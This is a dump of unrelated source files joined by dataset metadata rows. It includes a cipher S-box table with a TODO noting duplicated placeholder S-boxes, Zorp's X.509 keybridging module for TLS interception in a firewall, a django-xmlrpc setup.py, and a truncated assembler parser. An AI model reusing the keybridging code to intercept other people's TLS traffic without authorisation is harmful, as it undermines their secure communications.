0x0c, 0x02, 0x10, 0x1e, 0x34, 0x3a, 0x28, 0x26, 0x7c, 0x72, 0x60, 0x6e, 0x44, 0x4a, 0x58, 0x56,
0x37, 0x39, 0x2b, 0x25, 0x0f, 0x01, 0x13, 0x1d, 0x47, 0x49, 0x5b, 0x55, 0x7f, 0x71, 0x63, 0x6d,
0xd7, 0xd9, 0xcb, 0xc5, 0xef, 0xe1, 0xf3, 0xfd, 0xa7, 0xa9, 0xbb, 0xb5, 0x9f, 0x91, 0x83, 0x8d)
galI = gal14, gal11, gal13, gal9
galNI = gal2, gal3, gal1, gal1
# TODO: sbox_2..sbox_4 below are still identical copies of sbox_1 and need to be replaced with unique S-boxes
sbox_1 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
sbox_2 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
sbox_3 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
sbox_4 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
|
apache-2.0
| -5,848,863,981,821,541,000 | 91.090395 | 99 | 0.639732 | false |
mochrul/zorp
|
pylib/Zorp/Keybridge.py
|
1
|
21313
|
############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
"""
<module maturity="stable">
<summary>The Keybridge module implements generic X.509 key bridging.</summary>
<description>
<para>Keybridging is a method to let the client see a copy of the server's certificate (or vice versa), allowing it to inspect it and decide about its trustworthiness. Because of proxying the SSL/TLS connection, the client is not able to inspect the certificate of the server directly, therefore Zorp generates a certificate based on the server's certificate on-the-fly. This generated certificate is presented to the client.</para>
<para>For details on configuring keybridging, see <xref linkend="keybridging"/>.</para>
</description>
</module>
"""
from Zorp import *
from Certificate_ import ZorpCertificate
from FileLock import FileLock
import os
import OpenSSL
import hashlib
#
# Key selector is a hash containing one or more ways to
# identify a key or keypair. The meaning of various keys in the hash and how they are interpreted
# is as follows:
#
# 'zms-key' Contains the unique name of a keypair in ZMS
# 'bridge-trusted-key' Contains a certificate blob for which a new key can be generated,
# the key must be signed by the 'trusted' CA
# 'bridge-untrusted-key' Contains a certificate blob for which a new key can be generated,
# the key must be signed by the 'untrusted' CA.
#
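#
# For illustration only (the values below are placeholders, not real ZMS
# names or certificate blobs):
#
#   selector = {'zms-key': 'my-keypair'}
#   selector = {'bridge-trusted-key': cert_pem_blob}
#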
class X509KeyManager(object):
"""<class type="x509keymanager" internal="yes">
</class>"""
def __init__(self):
pass
def getKeypair(self, selector):
pass
class X509KeyBridge(X509KeyManager):
"""<class type="x509keymanager">
<summary>
Class to perform SSL keybridging.
</summary>
<description>
<para>
This class is able to generate certificates mimicking another
certificate, primarily used to transfer the information of a server's certificate to the client in keybridging. For details on configuring keybridging, see <xref linkend="keybridging"/>.
</para>
</description>
<metainfo>
<attributes>
<attribute>
<name>key_file</name>
<type>
<string/>
</type>
<default>""</default>
<description>Name of the private key to be used for the newly generated certificates.</description>
</attribute>
<attribute>
<name>key_passphrase</name>
<type>
<string/>
</type>
<default>""</default>
<description>Passphrase required to access the private key stored in <parameter>key_file</parameter>.</description>
</attribute>
<attribute>
<name>cache_directory</name>
<type>
<string/>
</type>
<default>""</default>
<description>The directory where all automatically generated certificates are cached.</description>
</attribute>
<attribute>
<name>trusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<default>None</default>
<description>A tuple of <parameter>cert_file</parameter>, <parameter>key_file</parameter>, <parameter>passphrase</parameter>) for the CA used for keybridging trusted certificates.</description>
</attribute>
<attribute>
<name>untrusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<default>None</default>
<description>A tuple of <parameter>cert_file</parameter>, <parameter>key_file</parameter>, <parameter>passphrase</parameter>) for the CA used for keybridging untrusted certificates.</description>
</attribute>
</attributes>
</metainfo>
</class>"""
def __new__(cls, *args, **kwargs):
"""
<method internal="yes"/>
"""
obj = super(X509KeyBridge, cls).__new__(cls)
base = cls
if base.__name__ != "X509KeyBridge":
for base in cls.__bases__:
if base.__name__ == "X509KeyBridge":
                    break
if kwargs.has_key("key_pem"):
base.__init__ = base._new_init
else:
base.__init__ = base._old_init
return obj
default_extension_whitelist = ('keyUsage', 'subjectAltName', 'extendedKeyUsage')
def _old_init(self, key_file, cache_directory=None, trusted_ca_files=None, untrusted_ca_files=None, key_passphrase = "",
extension_whitelist=None):
"""<method maturity="stable">
<metainfo>
<arguments>
<argument>
<name>key_file</name>
<type>
<certificate key="yes" cert="no"/>
</type>
<description>Name of the private key to be used for the newly generated certificates.</description>
</argument>
<argument>
<name>key_passphrase</name>
<type>
<string/>
</type>
<default>""</default>
<description>Passphrase required to access the private key stored in <parameter>key_file</parameter>.</description>
</argument>
<argument>
<name>cache_directory</name>
<type>
<string/>
</type>
<default>"/var/lib/zorp/keybridge-cache"</default>
<description>The directory where all automatically generated certificates are cached.</description>
</argument>
<argument>
<name>trusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
            <description>A tuple of (<parameter>cert_file</parameter>, <parameter>key_file</parameter>,
<parameter>passphrase</parameter>) for the CA used for keybridging trusted certificates.
</description>
</argument>
<argument>
<name>untrusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<default>None</default>
            <description>A tuple of (<parameter>cert_file</parameter>, <parameter>key_file</parameter>,
<parameter>passphrase</parameter>) for the CA used for keybridging untrusted certificates.
</description>
</argument>
<argument>
<name>extension_whitelist</name>
<type>
<list><string/></list>
</type>
<default>None</default>
<description>
<para>Zorp transfers the following certificate extensions to the client side: <parameter>Key Usage</parameter>, <parameter>Subject Alternative Name</parameter>, <parameter>Extended Key Usage</parameter>. Other extensions will be automatically deleted during keybridging. This is needed because some certificate extensions contain references to the Issuer CA, which references become invalid for keybridged certificates. To transfer other extensions, list them in the <parameter>extension_whitelist</parameter> parameter. Note that modifying this parameter replaces the default values, so to extend the list of transferred extensions, include the <parameter>'keyUsage', 'subjectAltName', 'extendedKeyUsage'</parameter> list as well. For example:</para>
<synopsis>self.extension_whitelist = ('keyUsage', 'subjectAltName', 'extendedKeyUsage', 'customExtension')</synopsis>
</description>
</argument>
</arguments>
</metainfo>
</method>"""
"""Constructor to initialize an X509KeyBridge instance
This constructor initializes an X509KeyBridge instance by
loading the necessary keys and certificates from files. Make
sure that it is initialized once, instead of in every proxy
instance as that may degrade performance. This may be
achieved by putting the initialization into the class body
or into global context.
Arguments
key_file -- name of the private key to be used for all newly generated certificates
key_passphrase -- passphrase to use with private key key_file
cache_directory -- name of a directory where all automatically generated certificates are cached
trusted_ca_files -- a tuple of (cert_file, key_file, passphrase) for a CA to be used for signing certificates
untrusted_ca_files -- a tuple of (cert_file, key_file, passphrase) for a CA to be used for signing untrusted certificates
"""
key_pem = self.readPEM(key_file)
if trusted_ca_files:
(trusted_cert_file, trusted_key_file, trusted_passphrase) = trusted_ca_files
try:
passphrase = trusted_passphrase
except IndexError:
passphrase = ""
trusted_ca_pems = (self.readPEM(trusted_cert_file), self.readPEM(trusted_key_file), passphrase)
if untrusted_ca_files:
(untrusted_cert_file, untrusted_key_file, untrusted_passphrase) = untrusted_ca_files
try:
passphrase = untrusted_passphrase
except IndexError:
passphrase = ""
untrusted_ca_pems = (self.readPEM(untrusted_cert_file), self.readPEM(untrusted_key_file), passphrase)
self._new_init(key_pem, cache_directory, trusted_ca_pems, untrusted_ca_pems, key_passphrase, extension_whitelist)
    def _new_init(self, key_pem, cache_directory=None, trusted_ca_files=None, untrusted_ca_files=None, key_passphrase="", extension_whitelist=None):
"""
<method internal="yes"/>
"""
if cache_directory:
self.cache_directory = cache_directory
else:
self.cache_directory = "/var/lib/zorp/keybridge-cache"
if not extension_whitelist:
extension_whitelist = self.default_extension_whitelist
self.extension_whitelist = extension_whitelist
self.initialized = 0
try:
self._load_privatekey(key_pem, trusted_ca_files, untrusted_ca_files, key_passphrase)
self.initialized = 1
except IOError, e:
log(None, CORE_ERROR, 3, "Error opening key or certificate file for keybridge; file='%s', error='%s'", (e.filename, e.strerror))
def _load_privatekey(self, key_pem, trusted_ca_files, untrusted_ca_files, key_passphrase):
"""<method internal="yes">
</method>"""
if not trusted_ca_files:
trusted_ca_files = (None, None, None)
(trusted_cert_file, trusted_key_file, trusted_passphrase) = trusted_ca_files
self.key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, key_pem, key_passphrase)
self.key_pem = key_pem
try:
passphrase = trusted_passphrase
except IndexError:
passphrase = ""
self.trusted_ca = (OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, trusted_cert_file),
OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, trusted_key_file, passphrase))
self.trusted_ca_pem = trusted_cert_file
self.untrusted_ca_pem = ""
if untrusted_ca_files:
(untrusted_cert_file, untrusted_key_file, untrusted_passphrase) = untrusted_ca_files
try:
passphrase = untrusted_passphrase
except IndexError:
passphrase = ""
self.untrusted_ca = (OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, untrusted_cert_file),
OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, untrusted_key_file, passphrase))
self.untrusted_ca_pem = untrusted_cert_file
def readPEM(self, filename):
"""<method internal="yes">
</method>
"""
log(None, CORE_DEBUG, 6, "Reading PEM file; filename='%s'" % filename)
f = open(filename, 'r')
res = f.read()
f.close()
return res
def getCachedKey(self, session_id, cert_file, cert_server):
"""<method internal="yes">
</method>"""
def is_md5(cert):
return cert.get_signature_algorithm().lower().find("md5") != -1
log(session_id, CORE_DEBUG, 5, "Loading cached certificate; file='%s'", cert_file)
try:
orig_cert = open(cert_file + '.orig', 'r').read()
except IOError, e:
log(session_id, CORE_DEBUG, 5, "Original keybridged certificate cannot be read, regenerating; file='%s', error='%s'", (cert_file, e.strerror))
raise KeyError('not in cache')
try:
cached_cert = open(cert_file, 'r').read()
cached_cert_x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cached_cert)
except IOError, e:
log(session_id, CORE_DEBUG, 5, "Cached certificate cannot be read, regenerating; file='%s', error='%s'", (cert_file, e.strerror))
raise KeyError('not in cache')
except OpenSSL.crypto.Error:
log(session_id, CORE_DEBUG, 5, "Cached certificate is not valid, regenerating; file='%s'", cert_file)
raise KeyError('not in cache')
cert_server_x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_server)
# Originally we signed every cert using md5, regardless of the server cert's algo.
# We regenerate every cert if the cached version uses md5 while the server cert uses a different algo.
if orig_cert == cert_server:
if is_md5(cached_cert_x509) and not is_md5(cert_server_x509):
log(session_id, CORE_DEBUG, 5, "Cached certificate is MD5 signed while server's certificate is not, regenerating; file='%s', cached_algo='%s', server_algo='%s'", (cert_file, cached_cert_x509.get_signature_algorithm(), cert_server_x509.get_signature_algorithm()))
else:
log(session_id, CORE_DEBUG, 5, "Cached certificate ok, reusing; file='%s'", cert_file)
return (cached_cert, OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, self.key))
else:
log(session_id, CORE_DEBUG, 5, "Cached certificate changed, regenerating; file='%s'", cert_file)
            raise KeyError('certificate changed')
def storeCachedKey(self, session_id, cert_file, new_blob, orig_blob):
"""<method internal="yes">
</method>"""
try:
try:
os.unlink(cert_file)
except OSError:
pass
try:
os.unlink(cert_file + '.orig')
except OSError:
pass
log(session_id, CORE_DEBUG, 5, "Storing cached certificate; file='%s'", cert_file)
f = open(cert_file, 'w')
f.write(new_blob)
f.close()
f = open(cert_file + '.orig', 'w')
f.write(orig_blob)
f.close()
except IOError, e:
log(session_id, CORE_ERROR, 2, "Error storing generated X.509 certificate in the cache; file='%s', error='%s'", (cert_file, e.strerror))
def getLastSerial(self):
"""<method internal="yes">
</method>"""
serial = 1
for file in os.listdir(self.cache_directory):
if file[-4:] != '.crt':
continue
f = open("%s/%s" % (self.cache_directory, file), 'r')
data = f.read()
f.close()
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, data)
cser = cert.get_serial_number()
if cser > serial:
serial = cser
return serial
def genCert(self, key, orig_cert, ca_cert, ca_key, serial):
"""<method internal="yes">
</method>"""
filetype = OpenSSL.crypto.FILETYPE_PEM
certificate = OpenSSL.crypto.dump_certificate(filetype, orig_cert)
if self.extension_whitelist:
# delete extensions not on whitelist
zorp_certificate = ZorpCertificate(certificate)
certificate = zorp_certificate.handle_extensions(self.extension_whitelist)
new_cert = OpenSSL.crypto.load_certificate(filetype, certificate)
new_cert.set_serial_number(serial)
new_cert.set_issuer(ca_cert.get_subject())
new_cert.set_pubkey(key)
hash_alg = orig_cert.get_signature_algorithm()
try:
new_cert.sign(ca_key, hash_alg)
except ValueError, e:
log(None, CORE_INFO, 3, "Could not sign cert with hash algorithm, falling back to SHA256; hash_alg='%s'", hash_alg)
new_cert.sign(ca_key, 'sha256')
return new_cert
def _save_new_cert(self, session_id, orig_blob, ca_pair, cert_file, serial):
"""<method internal="yes">
</method>"""
orig_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, orig_blob)
new_cert = self.genCert(self.key, orig_cert, ca_pair[0], ca_pair[1], serial)
new_blob = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, new_cert)
self.storeCachedKey(session_id, cert_file, new_blob, orig_blob)
return new_blob
def _dump_privatekey(self):
"""<method internal="yes">
</method>"""
return OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, self.key)
def _get_serial_filename(self):
"""<method internal="yes">
</method>"""
return '%s/serial.txt' % self.cache_directory
def getKeypair(self, session_id, selector):
"""<method internal="yes">
</method>"""
if not self.initialized:
log(session_id, CORE_ERROR, 3, "Keybridge not completely initialized, error generating keypair;")
return (None, None)
try:
trusted = 1
orig_blob = selector['bridge-trusted-key']
hash_key = orig_blob + self.trusted_ca_pem + self.key_pem
except KeyError:
trusted = 0
orig_blob = selector['bridge-untrusted-key']
hash_key = orig_blob + self.untrusted_ca_pem + self.key_pem
hash = hashlib.sha256(hash_key).hexdigest()
if trusted:
cert_file = '%s/trusted-%s.crt' % (self.cache_directory, hash)
ca_pair = self.trusted_ca
else:
cert_file = '%s/untrusted-%s.crt' % (self.cache_directory, hash)
ca_pair = self.untrusted_ca
with FileLock("%s/.lock" % self.cache_directory):
try:
return self.getCachedKey(session_id, cert_file, orig_blob)
except KeyError:
log(session_id, CORE_DEBUG, 5, "Certificate not found in the cache, regenerating;")
serial_file = self._get_serial_filename()
serial_pos = ""
try:
serial_pos = "file open"
serial_file_fd = open(serial_file, 'r')
serial_pos = "file read"
serial_file_data = serial_file_fd.read().strip()
serial_pos = "turn to integer"
serial = int(serial_file_data)
serial_pos = None
except (ValueError, IOError):
serial = self.getLastSerial()
log(session_id, CORE_ERROR, 3, "On-line CA serial file not found, reinitializing; file='%s', serial='%d', pos='%s'", (serial_file, serial, serial_pos))
serial = serial + 1
try:
with open(serial_file, 'w') as f:
f.write(str(serial))
except IOError, e:
log(session_id, CORE_ERROR, 2, "Cannot write serial number of on-line CA; file='%s', error='%s'", (serial_file, e.strerror))
new_blob = self._save_new_cert(session_id, orig_blob, ca_pair, cert_file, serial)
return (new_blob, self._dump_privatekey())
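
# Illustrative sketch (not part of the original module): constructing a
# keybridge and generating a bridged keypair. Every file name below is a
# hypothetical placeholder; see the class docstring for the parameters.
#
#   key_bridge = X509KeyBridge(
#       key_file="/etc/zorp/keybridge/key.pem",
#       cache_directory="/var/lib/zorp/keybridge-cache",
#       trusted_ca_files=("/etc/zorp/keybridge/trusted-ca.crt",
#                         "/etc/zorp/keybridge/trusted-ca.key", ""),
#       untrusted_ca_files=("/etc/zorp/keybridge/untrusted-ca.crt",
#                           "/etc/zorp/keybridge/untrusted-ca.key", ""))
#   (cert_pem, key_pem) = key_bridge.getKeypair(
#       session_id, {'bridge-trusted-key': server_cert_pem})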
|
gpl-2.0
| -1,043,015,836,164,202,400 | 43.309771 | 771 | 0.592643 | false |
Fantomas42/django-xmlrpc
|
setup.py
|
1
|
1097
|
import os
from setuptools import find_packages
from setuptools import setup
import django_xmlrpc
setup(name='django-xmlrpc',
version=django_xmlrpc.__version__,
description='XML-RPC Server App for the Django framework.',
long_description=open(os.path.join('README.rst')).read(),
keywords='django, service, xmlrpc',
author='Graham Binns',
author_email='graham.binns@gmail.com',
maintainer='Fantomas42',
maintainer_email='fantomas42@gmail.com',
url='https://github.com/Fantomas42/django-xmlrpc',
packages=find_packages(),
classifiers=[
'Framework :: Django',
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules'],
license='New BSD License',
include_package_data=True,
zip_safe=False
)
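# Illustrative sketch (not part of the original script): typical local usage
# is "pip install ." from the repository root, or "python setup.py sdist" to
# build a source distribution.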
|
bsd-3-clause
| 3,275,820,287,542,912,000 | 29.472222 | 74 | 0.633546 | false |
KB777/1541UltimateII
|
tools/parse_nano.py
|
1
|
6839
|
import sys
import logging
console = logging.StreamHandler()
logger = logging.getLogger()
logger.addHandler(console)
logger.setLevel(logging.ERROR)
labels = {}
program = []
imm_expr = []
imm_dict = {}
imm_values = []
nr = 0
def _get_value_imm(str):
if str[0] == '#':
if phase == 1:
            if str[1:] not in imm_expr:  # phase 1
imm_expr.append(str[1:])
return 0
else: # phase == 2
return imm_dict[_get_value(str[1:])] # phase 2
# not an immediate value
return _get_value(str)
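
# Illustrative sketch (not part of the original tool): an immediate operand
# such as "LOAD #5" is resolved in two passes -- pass 1 only records the
# expression "5" in imm_expr, and pass 2 rewrites the operand as the address
# at which resolve_immediates() pooled that constant after the program.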
def _get_value(str):
if str[0] == '#':
raise ValueError('Not allowed to use immediate value. Line %d' % nr)
if str[0] == '$':
val = int(str[1:], 16)
elif str[0:2] == '0x':
val = int(str[2:], 16)
else:
try:
val = int(str)
except ValueError:
try:
val = labels[str]
